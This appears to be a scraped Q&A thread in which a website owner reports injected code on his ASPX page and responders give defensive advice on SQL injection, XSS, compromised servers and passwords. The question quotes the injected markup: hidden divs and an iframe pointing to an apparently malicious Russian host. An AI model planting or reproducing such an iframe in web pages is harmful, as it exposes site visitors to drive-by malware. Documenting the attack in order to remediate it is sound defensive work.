tags:

views:

513

answers:

6
+3  Q: 

I'm being attacked - what can I do?

Someone is putting this code onto my aspx page.

What are they doing?

How are they doing it?

How do I stop them?

It's on a shared hosting server.

It's on an aspx content page which has a master page and is after the </asp:content> tag...

<div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div>

<div style="display:none">owhkhminltvnwvegxktzemrszyykcsh</div>

<div style="display:none">cljwdrmbxglllikbjctmpyvcflzxbqk</div>

<div style="display:none">vhhnvchdoxaklqjxlwaqvtgarazwcsx</div>

<div style="display:none">alsbcgosnllreyylgtmblvqwxgpidui</div>

<div style="display:none">yrrzaimkpvimddgirjpuatjzoyovdyq<iframe width=812 height=451 src="http://bionaft.ru:8080/index.php" ></iframe></div>
+38  A: 

Take your site offline.

No, I'm being serious.

Take it offline and look at all points that you deal with user inputs and look at your code and sanitise every user input, and every output. There's plenty of documentation on XSS, Code Injection and such.

squeeks  2009-10-07 09:11:06
Are you serious, this is a production site with clients, is there a way to find where they are doing this from?
Brendan Waters  2009-10-07 09:17:03
Of course I'm serious. You leave it running as it is, and search engines will crawl it with the malicious data and get you blacklisted for hosting malicious content, a banner that takes a long time to get reverted. Get your webserver logs and your code, take that site offline, clean up the code they've injected and sanitise your inputs.
squeeks  2009-10-07 09:19:25
Thanks for your help and your prompt reply.
Brendan Waters  2009-10-07 09:22:11
dad got his production sites blacklisted this way... took long to get rid off.
Dykam  2009-10-07 09:22:41
Ill flick the switch tonight.
Brendan Waters  2009-10-07 09:22:44
Make sure you compare your source code with an existing copy you take from you revision control system. If they could modify your source code, they could easily modify other parts to leave themselves a back door (although this is probably an automated attack). They could also have compromised your whole server...
Locksfree  2009-10-07 09:24:06
Turn the lights off as soon as possible. Don't wait, Googlebot won't be.
squeeks  2009-10-07 09:29:26
It needs to go down ASAP. If your clients is using this and they see whats happening Im sure they will loose alot of respect for your site. I sure as hell would've deleted my account and stopped dealing with you ASAP as this proves holes in integrity and confidentiality
ChrisAD  2009-10-08 08:48:23
+1  A: 

How does the page get rendered - is there content coming from a database? What is the url? have you set validateRequest to false?

more info needed I think

Paul  2009-10-07 09:24:24
Also, Have you downloaded the source file for the aspx or ascx (or whatever) for the page in question? Does it look the same as your source controlled version?
Paul  2009-10-07 09:41:33
no its got the injected code in it. I removed it last night and its back I also got about 16o errors on my site with my css files I think they were scanning for something, but they got the path to the css files incorrect
Brendan Waters  2009-10-07 09:45:05
Sounds like the server has been compromised fella. If it's a manged server, get on the phone to the host... if not, I would probably flatten and resinstall everything with new passwords. If this is not possible, change all passwords - check out user accounts on the server - remove any that you do not know about.
Paul  2009-10-07 09:49:20
+2  A: 

Is it yet another Automated SQL Injection attack? Check out your logs and see if there is something with "DECLARE" in it. (assuming you are using SQL Server)

dr. evil  2009-10-07 09:24:42
+1  A: 

It's on an aspx content page which has a master page and is after the </asp:content> tag...

Do you mean someone has got onto your sever and edited the .aspx files on the server? If that's the case make sure you have locked down any file shares and change all your passwords for ftp and the like.

If it's that the rendered pages have been mashed then the advice from @squeeks is the way to go.

ilivewithian  2009-10-07 09:29:35
The page is dynamically driven from the database.ValidateRequest is not set to false.I dont see any weird data in the logs or the tables within the database that are affected by this page.Its outside the content tags on the aspx page...Im beginning to think that my password has been compromised
Brendan Waters  2009-10-07 09:35:40
+2  A: 

It seems that you are not the only one. Google for it:

borjab  2009-10-07 09:54:39
A: 

Try looking into the AntiXSS libary; pages that are important, turn them off for a while. I believe you will need to update the code, use AntiXSS in every url; switch all of your direct query generation to Parameter based query generation; and than, things will be under control. Also, there is a lot of stuff regarding whitelist items on google/bing.

KMan  2009-10-07 10:01:26

related questions

Subsonic Vs NHibernate
How to check For File Lock in C# ?
Is nAnt still supported and suitable for .net 3.5/VS2008?
Limit size of Queue<T> in .NET?
Viewstate invalid when using Safari
Free OCR library
Unhandled Exception Handler in .NET 1.1
Localising date format descriptors
Get a new object instance from a Type in C#
VFP .NET OLEdb provider does not work in Win 64-Bits. Help
.NET Testing Framework Advice
Embedded Database for .net that can run off a network
Automatically update version number
Homegrown consumption of web services
How do you migrate a large app from VB6 to VB .net ?
.NET Migrations Engine
Adding Scripting functionality to .NET applications
SQLite and XSD
Floating Point Number parsing: Is there a Catch All algorithm?
How do I programmatically create a PDF in my .NET application?
How do I sync the SVN revision number with my ASP.NET web site?
XSD DataSets and ignoring foreign keys
Anatomy of a "Memory Leak"
Reliable Timer in a Console Application
How do I calculate relative time?